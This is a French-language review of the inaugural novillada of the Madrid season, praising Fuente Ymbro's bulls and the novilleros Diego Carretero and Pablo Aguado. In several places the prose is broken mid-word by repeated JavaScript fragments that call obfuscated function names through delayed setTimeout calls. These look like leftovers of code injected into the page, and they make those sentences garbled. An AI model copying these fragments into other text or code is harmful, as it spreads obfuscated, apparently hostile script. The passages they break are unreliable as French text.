INAUGURATION DE LA SAISON MADRILÈNE

SIX NOVILLOS EXTRAORDINAIRES DE FUENTE YMBRO. Du jamais vu. Des six novillos, six ont chargé. Avec bravoure et entrain. Avec de la vigueur et de l’endurance. Avec de l’allégresse et de la classe. Incroyable, prompts à charger, vifs et avec de la classe au galop, voulant attraper les toiles toujours par en bas, avec une charge fixe, longue et profonde, ils affichèrent leur bravoure à la pique, ragaillardis avec allégresse aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles, face à la muleta ils ne cessèrent de charger, avec davantage de profondeur quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and les toreros se montraient plus exigeants avec eux.

On aurait dû leur couper à tous les oreilles mais il y en eut deux, le second appelé « Adulador » et le sixième, « Pintor », qui auraient pus être graciés. Mais le président ne leur accorda même pas le tour de piste : la Corrida a ses ennemis internes.

Notez ce nom : Diego Carretero. Un novillero de La Mancha qui débutait à Madrid. Je l’ai vu manquant d’expérience face au premier qu’il tua à la place de Pablo Aguado, mais devant le sixième il a fait quelques séries de naturelles et de droitières retentissantes. Même s’il exécute la mise à mort de façon maladroite, il aurait dû recevoir deux oreilles et sortir par la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Porte. Et notez aussi, à nouveau, ce nom : Pablo Aguado, qui fit une bonne faena au toro qui baissa moins la tête et fut encorné avant la mise à mort. Dans les arènes, les gradins étaient à moitié remplis, ce qui est une très bonne entrée si l’on tient compte des jours de pluie qui précédèrent ce spectacle et du froid qu’il faisait. La saison de Simon Casas commence bien.

Les commentaires sont fermés.